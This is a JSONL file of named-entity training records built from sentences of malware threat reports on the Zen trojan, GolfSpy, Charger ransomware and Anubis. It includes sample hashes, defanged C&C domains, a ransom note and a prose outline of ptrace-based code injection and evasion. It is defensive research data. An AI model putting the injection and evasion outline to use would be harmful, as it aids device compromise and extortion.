{"text": "ed234e61849dcb95223676abe2312e1378d6130c0b00851d82cda545b946ec83 27410d4019251a70d38f0635277f931fb73f67ac9f2e1f3b475ce680ebfde12a 6e6c210535b414c5aa2dd9e67f5153feeb43a8ac8126d8e249e768f501323a3e 4a32ced20df7001da7d29edc31ca76e13eef0c9b355f62c44888853435e9794f", "spans": {}, "info": {"id": "cyner_train_002203", "source": "cyner_train"}}
{"text": "ac5abaebd9f516b8b389450f7d27649801d746fb14963b848f9d6dad0a505e66 3a45d7a16937d4108b5b48f44d72bb319be645cbe15f003dc9e77fd52f45c065 Domains cvcws [ .", "spans": {}, "info": {"id": "cyner_train_002204", "source": "cyner_train"}}
{"text": "] com nampriknum [ .", "spans": {}, "info": {"id": "cyner_train_002212", "source": "cyner_train"}}
{"text": "] today admin [ .databit [ .today cendata [ .", "spans": {}, "info": {"id": "cyner_train_002234", "source": "cyner_train"}}
{"text": "'' in a variety of ways , such as static analysis , dynamic analysis , and machine learning .", "spans": {}, "info": {"id": "cyner_train_002242", "source": "cyner_train"}}
{"text": "While our systems are great at automatically detecting and protecting against PHAs , we believe the best security comes from the combination of automated scanning and skilled human review .", "spans": {}, "info": {"id": "cyner_train_002243", "source": "cyner_train"}}
{"text": "Zen uses root permissions on a device to automatically enable a service that creates fake Google accounts .", "spans": {"MALWARE: Zen": [[0, 3]], "ORGANIZATION: Google": [[90, 96]]}, "info": {"id": "cyner_train_002245", "source": "cyner_train"}}
{"text": "Zen apps gain access to root permissions from a rooting trojan in its infection chain .", "spans": {"MALWARE: Zen": [[0, 3]]}, "info": {"id": "cyner_train_002247", "source": "cyner_train"}}
{"text": "In this blog post , we do not differentiate between the rooting component and the component that abuses root : we refer to them interchangeably as Zen .", "spans": {"MALWARE: Zen": [[147, 150]]}, "info": {"id": "cyner_train_002248", "source": "cyner_train"}}
{"text": "PHA authors usually try to hide their tracks , so attribution is difficult .", "spans": {}, "info": {"id": "cyner_train_002252", "source": "cyner_train"}}
{"text": "Sometimes , we can attribute different apps to the same author based on a small , unique pieces of evidence that suggest similarity , such as a repetition of an exceptionally rare code snippet , asset , or a particular string in the debug logs .", "spans": {}, "info": {"id": "cyner_train_002253", "source": "cyner_train"}}
{"text": "Every once in a while , authors leave behind a trace that allows us to attribute not only similar apps , but also multiple different PHA families to the same group or person .", "spans": {}, "info": {"id": "cyner_train_002254", "source": "cyner_train"}}
{"text": "Dynamic code loading makes it impossible to state what kind of PHA it was .", "spans": {}, "info": {"id": "cyner_train_002257", "source": "cyner_train"}}
{"text": "This sample displayed ads from various sources .", "spans": {}, "info": {"id": "cyner_train_002258", "source": "cyner_train"}}
{"text": "More recent variants blend rooting capabilities and click fraud .", "spans": {}, "info": {"id": "cyner_train_002259", "source": "cyner_train"}}
{"text": "This post does n't follow the chronological evolution of Zen , but instead covers relevant samples from least to most complex .", "spans": {"MALWARE: Zen": [[57, 60]]}, "info": {"id": "cyner_train_002261", "source": "cyner_train"}}
{"text": "By proxying all requests through a custom server , the real source of ads is opaque .", "spans": {}, "info": {"id": "cyner_train_002263", "source": "cyner_train"}}
{"text": "This example shows one possible implementation of this technique .", "spans": {}, "info": {"id": "cyner_train_002264", "source": "cyner_train"}}
{"text": "This approach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps .", "spans": {}, "info": {"id": "cyner_train_002265", "source": "cyner_train"}}
{"text": "It may even allow them to sell ad space directly to application developers .", "spans": {}, "info": {"id": "cyner_train_002266", "source": "cyner_train"}}
{"text": "Selling the ad traffic directly or displaying ads from other sources in a very large volume can provide direct profit to the app author from the advertisers .", "spans": {}, "info": {"id": "cyner_train_002268", "source": "cyner_train"}}
{"text": "The first are games of very low quality that mimic the experience of popular mobile games .", "spans": {}, "info": {"id": "cyner_train_002270", "source": "cyner_train"}}
{"text": "Instead of implementing very basic gameplay , the authors pirated and repackaged the original game in their app and bundled with it their advertisement SDK .", "spans": {}, "info": {"id": "cyner_train_002273", "source": "cyner_train"}}
{"text": "In all cases , the ads are used to convince users to install other apps from different developer accounts , but written by the same group .", "spans": {}, "info": {"id": "cyner_train_002275", "source": "cyner_train"}}
{"text": "Click fraud apps The authors ' tactics evolved from advertisement spam to real PHA ( Click Fraud ) .", "spans": {}, "info": {"id": "cyner_train_002277", "source": "cyner_train"}}
{"text": "Click fraud PHAs simulate user clicks on ads instead of simply displaying ads and waiting for users to click them .", "spans": {}, "info": {"id": "cyner_train_002278", "source": "cyner_train"}}
{"text": "This behavior negatively impacts advertisement networks and their clients because advertising budget is spent without acquiring real customers , and impacts user experience by consuming their data plan resources .", "spans": {}, "info": {"id": "cyner_train_002280", "source": "cyner_train"}}
{"text": "The click fraud PHA requests a URL to the advertising network directly instead of proxying it through an additional SDK .", "spans": {}, "info": {"id": "cyner_train_002281", "source": "cyner_train"}}
{"text": "The command & control server ( C & C server ) returns the URL to click along with a very long list of additional parameters in JSON format .", "spans": {}, "info": {"id": "cyner_train_002282", "source": "cyner_train"}}
{"text": "After rendering the ad on the screen , the app tries to identify the part of the advertisement website to click .", "spans": {}, "info": {"id": "cyner_train_002283", "source": "cyner_train"}}
{"text": "If that part is found , the app loads Javascript snippets from the JSON parameters to click a button or other HTML element , simulating a real user click .", "spans": {}, "info": {"id": "cyner_train_002284", "source": "cyner_train"}}
{"text": "Because a user interacting with an ad often leads to a higher chance of the user purchasing something , ad networks often \" pay per click '' to developers who host their ads .", "spans": {}, "info": {"id": "cyner_train_002285", "source": "cyner_train"}}
{"text": "Therefore , by simulating fraudulent clicks , these developers are making money without requiring a user to click on an advertisement .", "spans": {}, "info": {"id": "cyner_train_002286", "source": "cyner_train"}}
{"text": "It has been shortened for brevity .", "spans": {}, "info": {"id": "cyner_train_002288", "source": "cyner_train"}}
{"text": "Using a publicly available rooting framework , the PHA attempts to root devices and gain persistence on them by reinstalling itself on the system partition of rooted device .", "spans": {}, "info": {"id": "cyner_train_002291", "source": "cyner_train"}}
{"text": "Installing apps on the system partition makes it harder for the user to remove the app .", "spans": {}, "info": {"id": "cyner_train_002292", "source": "cyner_train"}}
{"text": "This technique only works for unpatched devices running Android 4.3 or lower .", "spans": {"SYSTEM: Android 4.3": [[56, 67]]}, "info": {"id": "cyner_train_002293", "source": "cyner_train"}}
{"text": "Devices running Android 4.4 and higher are protected by Verified Boot .", "spans": {"SYSTEM: Android 4.4": [[16, 27]]}, "info": {"id": "cyner_train_002294", "source": "cyner_train"}}
{"text": "Zen 's rooting trojan apps target a specific device model with a very specific system image .", "spans": {"MALWARE: Zen": [[0, 3]]}, "info": {"id": "cyner_train_002295", "source": "cyner_train"}}
{"text": "Replicating framework.jar allows the app to intercept and modify the behavior of the Android standard API .", "spans": {"SYSTEM: Android": [[85, 92]]}, "info": {"id": "cyner_train_002297", "source": "cyner_train"}}
{"text": "In particular , these apps try to add an additional method called statistics ( ) into the Activity class .", "spans": {}, "info": {"id": "cyner_train_002298", "source": "cyner_train"}}
{"text": "The only purpose of this method is to connect to the C & C server .", "spans": {}, "info": {"id": "cyner_train_002301", "source": "cyner_train"}}
{"text": "The Zen trojan After achieving persistence , the trojan downloads additional payloads , including another trojan called Zen .", "spans": {"MALWARE: Zen": [[4, 7], [120, 123]]}, "info": {"id": "cyner_train_002302", "source": "cyner_train"}}
{"text": "Zen requires root to work correctly on the Android operating system .", "spans": {"MALWARE: Zen": [[0, 3]], "SYSTEM: Android": [[43, 50]]}, "info": {"id": "cyner_train_002303", "source": "cyner_train"}}
{"text": "The Zen trojan uses its root privileges to turn on accessibility service ( a service used to allow Android users with disabilities to use their devices ) for itself by writing to a system-wide setting value enabled_accessibility_services .", "spans": {"MALWARE: Zen": [[4, 7]], "SYSTEM: Android": [[99, 106]]}, "info": {"id": "cyner_train_002304", "source": "cyner_train"}}
{"text": "The trojan implements three accessibility services directed at different Android API levels and uses these accessibility services , chosen by checking the operating system version , to create new Google accounts .", "spans": {"SYSTEM: Android API": [[73, 84]], "ORGANIZATION: Google": [[196, 202]]}, "info": {"id": "cyner_train_002307", "source": "cyner_train"}}
{"text": "This is done by opening the Google account creation process and parsing the current view .", "spans": {"ORGANIZATION: Google": [[28, 34]]}, "info": {"id": "cyner_train_002308", "source": "cyner_train"}}
{"text": "The app then clicks the appropriate buttons , scrollbars , and other UI elements to go through account sign-up without user intervention .", "spans": {}, "info": {"id": "cyner_train_002309", "source": "cyner_train"}}
{"text": "During the account sign-up process , Google may flag the account creation attempt as suspicious and prompt the app to solve a CAPTCHA .", "spans": {"ORGANIZATION: Google": [[37, 43]]}, "info": {"id": "cyner_train_002310", "source": "cyner_train"}}
{"text": "It is unclear if the remote server is capable of solving the CAPTCHA image automatically or if this is done manually by a human in the background .", "spans": {}, "info": {"id": "cyner_train_002312", "source": "cyner_train"}}
{"text": "The Zen trojan does not implement any kind of obfuscation except for one string that is encoded using Base64 encoding .", "spans": {"MALWARE: Zen": [[4, 7]]}, "info": {"id": "cyner_train_002314", "source": "cyner_train"}}
{"text": "It 's one of the strings - \" How you 'll sign in '' - that it looks for during the account creation process .", "spans": {}, "info": {"id": "cyner_train_002315", "source": "cyner_train"}}
{"text": "The code snippet below shows part of the screen parsing process .", "spans": {}, "info": {"id": "cyner_train_002316", "source": "cyner_train"}}
{"text": "Apart from injecting code to read the CAPTCHA , the app also injects its own code into the system_server process , which requires root privileges .", "spans": {}, "info": {"id": "cyner_train_002317", "source": "cyner_train"}}
{"text": "This indicates that the app tries to hide itself from any anti-PHA systems that look for a specific app process name or does not have the ability to scan the memory of the system_server process .", "spans": {}, "info": {"id": "cyner_train_002318", "source": "cyner_train"}}
{"text": "The app also creates hooks to prevent the phone from rebooting , going to sleep or allowing the user from pressing hardware buttons during the account creation process .", "spans": {}, "info": {"id": "cyner_train_002319", "source": "cyner_train"}}
{"text": "These hooks are created using the root access and a custom native code called Lmt_INJECT , although the algorithm for this is well known .", "spans": {}, "info": {"id": "cyner_train_002320", "source": "cyner_train"}}
{"text": "Then the app finds a process id value for the process it wants to inject with code .", "spans": {}, "info": {"id": "cyner_train_002322", "source": "cyner_train"}}
{"text": "This is done using a series of syscalls as outlined below .", "spans": {}, "info": {"id": "cyner_train_002323", "source": "cyner_train"}}
{"text": "The \" source process '' refers to the Zen trojan running as root , while the \" target process '' refers to the process to which the code is injected and [ pid ] refers to the target process pid value .", "spans": {"MALWARE: Zen": [[38, 41]]}, "info": {"id": "cyner_train_002324", "source": "cyner_train"}}
{"text": "The source process checks the mapping between a process id and a process name .", "spans": {}, "info": {"id": "cyner_train_002325", "source": "cyner_train"}}
{"text": "This is done by reading the /proc/ [ pid ] /cmdline file .", "spans": {}, "info": {"id": "cyner_train_002326", "source": "cyner_train"}}
{"text": "This very first step fails in Android 7.0 and higher , even with a root permission .", "spans": {"SYSTEM: Android 7.0": [[30, 41]]}, "info": {"id": "cyner_train_002327", "source": "cyner_train"}}
{"text": "The /proc filesystem is now mounted with a hidepid=2 parameter , which means that the process can not access other process /proc/ [ pid ] directory .", "spans": {}, "info": {"id": "cyner_train_002328", "source": "cyner_train"}}
{"text": "A ptrace_attach syscall is called .", "spans": {}, "info": {"id": "cyner_train_002329", "source": "cyner_train"}}
{"text": "This allows the source process to trace the target .", "spans": {}, "info": {"id": "cyner_train_002330", "source": "cyner_train"}}
{"text": "The source process looks at its own memory to calculate the offset between the beginning of the libc library and the mmap address .", "spans": {}, "info": {"id": "cyner_train_002331", "source": "cyner_train"}}
{"text": "The source process tries to determine the location of dlopen , dlsym , and dlclose functions in the target process .", "spans": {}, "info": {"id": "cyner_train_002334", "source": "cyner_train"}}
{"text": "The source process writes the native shellcode into the memory region allocated by mmap .", "spans": {}, "info": {"id": "cyner_train_002336", "source": "cyner_train"}}
{"text": "The source process changes the registers in the target process so that PC register points directly to the shellcode .", "spans": {}, "info": {"id": "cyner_train_002339", "source": "cyner_train"}}
{"text": "This is done using the ptrace syscall .", "spans": {}, "info": {"id": "cyner_train_002340", "source": "cyner_train"}}
{"text": "This diagram illustrates the whole process .", "spans": {}, "info": {"id": "cyner_train_002341", "source": "cyner_train"}}
{"text": "Summary PHA authors go to great lengths to come up with increasingly clever ways to monetize their apps .", "spans": {}, "info": {"id": "cyner_train_002342", "source": "cyner_train"}}
{"text": "The app that resulted in the largest number of affected users was the click fraud version , which was installed over 170,000 times at its peak in February 2018 .", "spans": {}, "info": {"id": "cyner_train_002344", "source": "cyner_train"}}
{"text": "The most affected countries were India , Brazil , and Indonesia .", "spans": {}, "info": {"id": "cyner_train_002345", "source": "cyner_train"}}
{"text": "In most cases , these click fraud apps were uninstalled by the users , probably due to the low quality of the apps .", "spans": {}, "info": {"id": "cyner_train_002346", "source": "cyner_train"}}
{"text": "If Google Play Protect detects one of these apps , Google Play Protect will show a warning to users .", "spans": {"SYSTEM: Google Play Protect": [[3, 22], [51, 70]]}, "info": {"id": "cyner_train_002347", "source": "cyner_train"}}
{"text": "We are constantly on the lookout for new threats and we are expanding our protections .", "spans": {}, "info": {"id": "cyner_train_002348", "source": "cyner_train"}}
{"text": "You can check the status of Google Play Protect on your device : Open your Android device 's Google Play Store app .", "spans": {"SYSTEM: Google Play Protect": [[28, 47]], "SYSTEM: Google Play Store": [[93, 110]]}, "info": {"id": "cyner_train_002350", "source": "cyner_train"}}
{"text": "Tap Menu > Play Protect .", "spans": {}, "info": {"id": "cyner_train_002351", "source": "cyner_train"}}
{"text": "Look for information about the status of your device .", "spans": {}, "info": {"id": "cyner_train_002352", "source": "cyner_train"}}
{"text": "Hashes of samples Type Package name SHA256 digest Custom ads com.targetshoot.zombieapocalypse.sniper.zombieshootinggame 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928 Click fraud com.counterterrorist.cs.elite.combat.shootinggame 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04", "spans": {}, "info": {"id": "cyner_train_002353", "source": "cyner_train"}}
{"text": "Rooting trojan com.android.world.news bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213 Zen trojan com.lmt.register eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d Mobile Campaign ‘ Bouncing Golf ’ Affects Middle East We uncovered a cyberespionage campaign targeting Middle", "spans": {"MALWARE: Zen": [[103, 106]], "MALWARE: Bouncing Golf": [[214, 227]]}, "info": {"id": "cyner_train_002354", "source": "cyner_train"}}
{"text": "Malicious codes are embedded in apps that the operators repackaged from legitimate applications .", "spans": {}, "info": {"id": "cyner_train_002358", "source": "cyner_train"}}
{"text": "Monitoring the command and control ( C & C ) servers used by Bouncing Golf , we ’ ve so far observed more than 660 Android devices infected with GolfSpy .", "spans": {"MALWARE: Bouncing Golf": [[61, 74]], "SYSTEM: Android": [[115, 122]], "MALWARE: GolfSpy": [[145, 152]]}, "info": {"id": "cyner_train_002359", "source": "cyner_train"}}
{"text": "The campaign ’ s attack vector is also interesting .", "spans": {}, "info": {"id": "cyner_train_002361", "source": "cyner_train"}}
{"text": "Also of note is Bouncing Golf ’ s possible connection to a previously reported mobile cyberespionage campaign that researchers named Domestic Kitten .", "spans": {"MALWARE: Bouncing Golf": [[16, 29]], "MALWARE: Domestic Kitten": [[133, 148]]}, "info": {"id": "cyner_train_002364", "source": "cyner_train"}}
{"text": "The strings of code , for one , are similarly structured .", "spans": {}, "info": {"id": "cyner_train_002365", "source": "cyner_train"}}
{"text": "The data targeted for theft also have similar formats .", "spans": {}, "info": {"id": "cyner_train_002366", "source": "cyner_train"}}
{"text": "GolfSpy ’ s infection chain GolfSpy 's Potential Impact Given GolfSpy ’ s information-stealing capabilities , this malware can effectively hijack an infected Android device .", "spans": {"MALWARE: GolfSpy": [[0, 7], [28, 35], [62, 69]], "SYSTEM: Android": [[158, 165]]}, "info": {"id": "cyner_train_002368", "source": "cyner_train"}}
{"text": "Here is a list of information that GolfSpy steals : Device accounts List of applications installed in the device Device ’ s current running processes Battery status Bookmarks/Histories of the device ’ s default browser Call logs and records Clipboard contents Contacts , including those in VCard format Mobile operator information Files stored on SDcard Device location List of image , audio , and video files stored on the device Storage and memory information Connection information Sensor information SMS messages Pictures GolfSpy also has a function that lets it connect to a remote server to fetch and perform commands", "spans": {"MALWARE: GolfSpy": [[35, 42], [526, 533]]}, "info": {"id": "cyner_train_002369", "source": "cyner_train"}}
{"text": ", including : searching for , listing , deleting , and renaming files as well as downloading a file into and retrieving a file from the device ; taking screenshots ; installing other application packages ( APK ) ; recording audio and video ; and updating the malware .", "spans": {}, "info": {"id": "cyner_train_002370", "source": "cyner_train"}}
{"text": "Technical Analysis The repackaged applications are embedded with malicious code , which can be found in the com.golf package .", "spans": {}, "info": {"id": "cyner_train_002371", "source": "cyner_train"}}
{"text": "These repackaged apps pose as communication , news , lifestyle , book , and reference apps popularly used in the Middle East .", "spans": {}, "info": {"id": "cyner_train_002372", "source": "cyner_train"}}
{"text": "The GolfSpy malware embedded in the apps is hardcoded with an internal name used by the attacker .", "spans": {"MALWARE: GolfSpy": [[4, 11]]}, "info": {"id": "cyner_train_002373", "source": "cyner_train"}}
{"text": "Icons of the apps that Bouncing Golf ’ s operators repackaged ( top ) and a comparison of packages between the original legitimate app ( bottom left ) and GolfSpy ( bottom right ) Figure 3 .", "spans": {"MALWARE: Bouncing Golf": [[23, 36]], "MALWARE: GolfSpy": [[155, 162]]}, "info": {"id": "cyner_train_002375", "source": "cyner_train"}}
{"text": "GolfSpy ’ s configurations encoded by a custom algorithm ( right ) and its decoded version ( left ) As shown in Figure 3 , GolfSpy ’ s configurations ( e.g. , C & C server , secret keys ) are encoded by a customized algorithm .", "spans": {"MALWARE: GolfSpy": [[0, 7], [123, 130]]}, "info": {"id": "cyner_train_002376", "source": "cyner_train"}}
{"text": "The information is written into a file on the device .", "spans": {}, "info": {"id": "cyner_train_002378", "source": "cyner_train"}}
{"text": "Code snippet showing GolfSpy generating UUID The value of % is in the range of 1-9 or a-j .", "spans": {"MALWARE: GolfSpy": [[21, 28]]}, "info": {"id": "cyner_train_002381", "source": "cyner_train"}}
{"text": "Each value represents a different type of data to steal from the device : Value Data Type 1 Accounts 2 Installed APP list 3 Running processes list 4 Battery status 5 Browser bookmarks and histories 6 Call logs 7 Clipboard 8 Contacts 9 Mobile operator information a File list on SD card b Location c Image list d Audio list e Video list f Storage and memory information g Connection information h Sensors information i SMS messages j VCard format contacts Table 1 .", "spans": {}, "info": {"id": "cyner_train_002382", "source": "cyner_train"}}
{"text": "The type of data corresponding to the value coded in GolfSpy Figure 5 shows the code snippets that are involved in monitoring and recording the device ’ s phone call .", "spans": {"MALWARE: GolfSpy": [[53, 60]]}, "info": {"id": "cyner_train_002383", "source": "cyner_train"}}
{"text": "It will also take a photo using the device ’ s front camera when the user wakes the device .", "spans": {}, "info": {"id": "cyner_train_002384", "source": "cyner_train"}}
{"text": "GolfSpy encrypts all the stolen data using a simple XOR operation with a pre-configured key before sending it to the C & C server using the HTTP POST method .", "spans": {"MALWARE: GolfSpy": [[0, 7]]}, "info": {"id": "cyner_train_002386", "source": "cyner_train"}}
{"text": "Code snippets showing how GolfSpy monitors phone calls via register receiver ( top left ) , its actions when the device is woken up ( top right ) , and how it encrypts the stolen data ( bottom ) The malware retrieves commands from the C & C server via HTTP , and attackers can steal specific files on the infected device .", "spans": {"MALWARE: GolfSpy": [[26, 33]]}, "info": {"id": "cyner_train_002388", "source": "cyner_train"}}
{"text": "The command is a constructed string split into three parts using \" \" as a separator .", "spans": {}, "info": {"id": "cyner_train_002389", "source": "cyner_train"}}
{"text": "The first part is the target directory , the second is a regular expression used to match specific files , while the last part is an ID .", "spans": {}, "info": {"id": "cyner_train_002390", "source": "cyner_train"}}
{"text": "The small or limited number is understandable given the nature of this campaign , but we also expect it to increase or even diversify in terms of distribution .", "spans": {}, "info": {"id": "cyner_train_002397", "source": "cyner_train"}}
{"text": "Bouncing Golf ’ s operators also try to cover their tracks .", "spans": {"MALWARE: Bouncing Golf": [[0, 13]]}, "info": {"id": "cyner_train_002399", "source": "cyner_train"}}
{"text": "The C & C server IP addresses used also appear to be disparate , as they were located in many European countries like Russia , France , Holland , and Germany .", "spans": {}, "info": {"id": "cyner_train_002401", "source": "cyner_train"}}
{"text": "It ’ s not a definite correlation , but Bouncing Golf also seems to have a connection with Domestic Kitten due to similarities we found in their code .", "spans": {"MALWARE: Bouncing Golf": [[40, 53]], "MALWARE: Domestic Kitten": [[91, 106]]}, "info": {"id": "cyner_train_002402", "source": "cyner_train"}}
{"text": "For example , the Android malware that both deploy share the same strings of code for their decoding algorithm .", "spans": {"SYSTEM: Android": [[18, 25]]}, "info": {"id": "cyner_train_002403", "source": "cyner_train"}}
{"text": "The data that Domestic Kitten steals follows a similar format with Bouncing Golf ’ s , with each type of data having a unique identifying character .", "spans": {"MALWARE: Domestic Kitten": [[14, 29]], "MALWARE: Bouncing Golf": [[67, 80]]}, "info": {"id": "cyner_train_002404", "source": "cyner_train"}}
{"text": "It ’ s also worth noting that both campaigns repackage apps that are commonly used in their target ’ s countries , such as Telegram , Kik , and Plus messaging apps .", "spans": {"SYSTEM: Telegram": [[123, 131]], "SYSTEM: Kik": [[134, 137]], "SYSTEM: Plus": [[144, 148]]}, "info": {"id": "cyner_train_002405", "source": "cyner_train"}}
{"text": "Code snippets showing : the decoding algorithm shared by both Bouncing Golf and Domestic Kitten ( top ) , the format of data that Domestic Kitten ’ s malware targets to steal ( center ) , and how both Bouncing Golf ( bottom left ) and Domestic Kitten ( bottom right ) use \" \" as a separator in their command strings .", "spans": {"MALWARE: Bouncing Golf": [[62, 75], [201, 214]], "MALWARE: Domestic Kitten": [[80, 95], [130, 145], [235, 250]]}, "info": {"id": "cyner_train_002407", "source": "cyner_train"}}
{"text": "As we ’ ve seen in last year ’ s mobile threat landscape , we expect more cyberespionage campaigns targeting the mobile platform given its ubiquity , employing tried-and-tested techniques to lure unwitting users .", "spans": {}, "info": {"id": "cyner_train_002408", "source": "cyner_train"}}
{"text": "The extent of information that these kinds of threats can steal is also significant , as it lets attackers virtually take over a compromised device .", "spans": {}, "info": {"id": "cyner_train_002409", "source": "cyner_train"}}
{"text": "Users should adopt best practices , while organizations should ensure that they balance the need for mobility and the importance of security .", "spans": {}, "info": {"id": "cyner_train_002410", "source": "cyner_train"}}
{"text": "Several weeks ago , Check Point Mobile Threat Prevention detected and quarantined the Android device of an unsuspecting customer employee who downloaded and installed a 0day mobile ransomware from Google Play dubbed “ Charger. ” This incident demonstrates how malware can be a dangerous threat to your business , and how advanced behavioral detection fills mobile security gaps attackers use to penetrate entire networks .", "spans": {"ORGANIZATION: Check Point": [[20, 31]], "SYSTEM: Android": [[86, 93]], "SYSTEM: Google Play": [[197, 208]], "MALWARE: Charger.": [[218, 226]]}, "info": {"id": "cyner_train_002414", "source": "cyner_train"}}
{"text": "Charger was found embedded in an app called EnergyRescue .", "spans": {"MALWARE: Charger": [[0, 7]], "MALWARE: EnergyRescue": [[44, 56]]}, "info": {"id": "cyner_train_002415", "source": "cyner_train"}}
{"text": "If granted , the ransomware locks the device and displays a message demanding payment : You need to pay for us , otherwise we will sell portion of your personal information on black market every 30 minutes .", "spans": {}, "info": {"id": "cyner_train_002417", "source": "cyner_train"}}
{"text": "WE GIVE 100 % GUARANTEE THAT ALL FILES WILL RESTORE AFTER WE RECEIVE PAYMENT .", "spans": {}, "info": {"id": "cyner_train_002418", "source": "cyner_train"}}
{"text": "WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER !", "spans": {}, "info": {"id": "cyner_train_002419", "source": "cyner_train"}}
{"text": "TURNING OFF YOUR PHONE IS MEANINGLESS , ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS !", "spans": {}, "info": {"id": "cyner_train_002420", "source": "cyner_train"}}
{"text": "WE STILL CAN SELLING IT FOR SPAM , FAKE , BANK CRIME etc… We collect and download all of your personal data .", "spans": {}, "info": {"id": "cyner_train_002421", "source": "cyner_train"}}
{"text": "All information about your social networks , Bank accounts , Credit Cards .", "spans": {}, "info": {"id": "cyner_train_002422", "source": "cyner_train"}}
{"text": "We collect all data about your friends and family .", "spans": {}, "info": {"id": "cyner_train_002423", "source": "cyner_train"}}
{"text": "The ransom demand for 0.2 Bitcoins ( roughly $ 180 ) is a much higher ransom demand than has been seen in mobile ransomware so far .", "spans": {}, "info": {"id": "cyner_train_002424", "source": "cyner_train"}}
{"text": "By comparison , the DataLust ransomware demanded merely $ 15 .", "spans": {"MALWARE: DataLust": [[20, 28]]}, "info": {"id": "cyner_train_002425", "source": "cyner_train"}}
{"text": "Payments are made to a specific Bitcoin account , but we haven ’ t identified any payments so far .", "spans": {"SYSTEM: Bitcoin": [[32, 39]]}, "info": {"id": "cyner_train_002426", "source": "cyner_train"}}
{"text": "Adware commonly found on Play collects profits from ad networks , but mobile ransomware inflicts direct harm to users .", "spans": {}, "info": {"id": "cyner_train_002427", "source": "cyner_train"}}
{"text": "Similar to other malware seen in the past , Charger checks the local settings of the device and does not run its malicious logic if the device is located in Ukraine , Russia , or Belarus .", "spans": {"MALWARE: Charger": [[44, 51]]}, "info": {"id": "cyner_train_002429", "source": "cyner_train"}}
{"text": "Charger , however , uses a heavy packing approach which it harder for the malware to stay hidden , so it must compensate with other means .", "spans": {"MALWARE: Charger": [[0, 7]]}, "info": {"id": "cyner_train_002432", "source": "cyner_train"}}
{"text": "The developers of Charger gave it everything they had to boost its evasion capabilities and so it could stay hidden on Google Play for as long as possible .", "spans": {"MALWARE: Charger": [[18, 25]], "SYSTEM: Google Play": [[119, 130]]}, "info": {"id": "cyner_train_002433", "source": "cyner_train"}}
{"text": "The malware uses several advanced techniques to hide its real intentions and makes it harder to detect .", "spans": {}, "info": {"id": "cyner_train_002434", "source": "cyner_train"}}
{"text": "It encodes strings into binary arrays , making it hard to inspect them .", "spans": {}, "info": {"id": "cyner_train_002435", "source": "cyner_train"}}
{"text": "It loads code from encrypted resources dynamically , which most detection engines can not penetrate and inspect .", "spans": {}, "info": {"id": "cyner_train_002436", "source": "cyner_train"}}
{"text": "It checks whether it is being run in an emulator before it starts its malicious activity .", "spans": {}, "info": {"id": "cyner_train_002438", "source": "cyner_train"}}
{"text": "Emulator and location conditions for the malware ’ s activity Check Point Mobile Threat Prevention customers are protected from Charger and similar malware .", "spans": {"ORGANIZATION: Check Point": [[62, 73]], "MALWARE: Charger": [[128, 135]]}, "info": {"id": "cyner_train_002440", "source": "cyner_train"}}
{"text": "Check Point ’ s Analysis and Response Team ( ART ) disclosed the finding to Android ’ s Security team who took the appropriate security steps to remove the infected app and added the malware to Android ’ s built-in protection mechanisms .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "SYSTEM: Android": [[76, 83], [194, 201]]}, "info": {"id": "cyner_train_002441", "source": "cyner_train"}}
{"text": "With mobile devices increasingly used in the corporate environment , thanks to the popularity of BYOD policies , this malware has the potential to cause serious harm , mostly to consumers , and businesses that allow the installation of unsigned applications .", "spans": {}, "info": {"id": "cyner_train_002445", "source": "cyner_train"}}
{"text": "Let ’ s take a closer look at the suspicious file .", "spans": {}, "info": {"id": "cyner_train_002448", "source": "cyner_train"}}
{"text": "Figure 1 – Phishing Email When the email link is opened from an Android device , an APK file ( Fattura002873.apk ) , is downloaded .", "spans": {"SYSTEM: Android": [[64, 71]]}, "info": {"id": "cyner_train_002449", "source": "cyner_train"}}
{"text": "Upon opening the file , the user is asked to enable “ Google Play Protect ” as shown in Figure 2 .", "spans": {"SYSTEM: Google Play": [[54, 65]]}, "info": {"id": "cyner_train_002450", "source": "cyner_train"}}
{"text": "However , this is not a genuine “ Google Play Protect ” screen ; instead it gives the app all the permissions it needs while simultaneously disabling the actual Google Play Protect .", "spans": {"SYSTEM: Google Play": [[34, 45]], "SYSTEM: Google Play Protect": [[161, 180]]}, "info": {"id": "cyner_train_002451", "source": "cyner_train"}}
{"text": "The malware mainly targets banking and financial applications , but also looks for popular shopping apps such as eBay or Amazon .", "spans": {"ORGANIZATION: eBay": [[113, 117]], "ORGANIZATION: Amazon": [[121, 127]]}, "info": {"id": "cyner_train_002453", "source": "cyner_train"}}
{"text": "A full list of targeted applications is included in the IOC section at the end of this post .", "spans": {}, "info": {"id": "cyner_train_002454", "source": "cyner_train"}}
{"text": "Figure 4 – Checking for installed apps Based on a thorough analysis of the code , the most interesting technical capabilities include : Capturing screenshots Enabling or changing administration settings Opening and visiting any URL Disabling Play Protect Recording audio Making phone calls Stealing the contact list Controlling the device via VNC Sending , receiving and deleting SMS Locking the device Encrypting files on the device and external drives Searching for files Retrieving the GPS location Capturing remote control commands from Twitter and Telegram Pushing overlays Reading the device ID The malware includes", "spans": {"SYSTEM: Twitter": [[541, 548]], "SYSTEM: Telegram": [[553, 561]]}, "info": {"id": "cyner_train_002456", "source": "cyner_train"}}
{"text": "a keylogger that works in every app installed on the Android device .", "spans": {"SYSTEM: Android": [[53, 60]]}, "info": {"id": "cyner_train_002457", "source": "cyner_train"}}
{"text": "However , the keylogger needs to be specifically enabled by a command sent from the C2 server .", "spans": {}, "info": {"id": "cyner_train_002458", "source": "cyner_train"}}
{"text": "The keylogger can track three different events ( Figure 5 ) : TYPE_VIEW_CLICKED Represents the event of clicking on a View-like Button , CompoundButton , etc .", "spans": {}, "info": {"id": "cyner_train_002459", "source": "cyner_train"}}
{"text": "TYPE_VIEW_FOCUSED Represents the event of setting input focus of a View .", "spans": {}, "info": {"id": "cyner_train_002460", "source": "cyner_train"}}
{"text": "Figure 5 – Keylogger component Figure 6 shows one of the most noteworthy functions of Anubis : its ransomware module .", "spans": {"MALWARE: Anubis": [[86, 92]]}, "info": {"id": "cyner_train_002462", "source": "cyner_train"}}
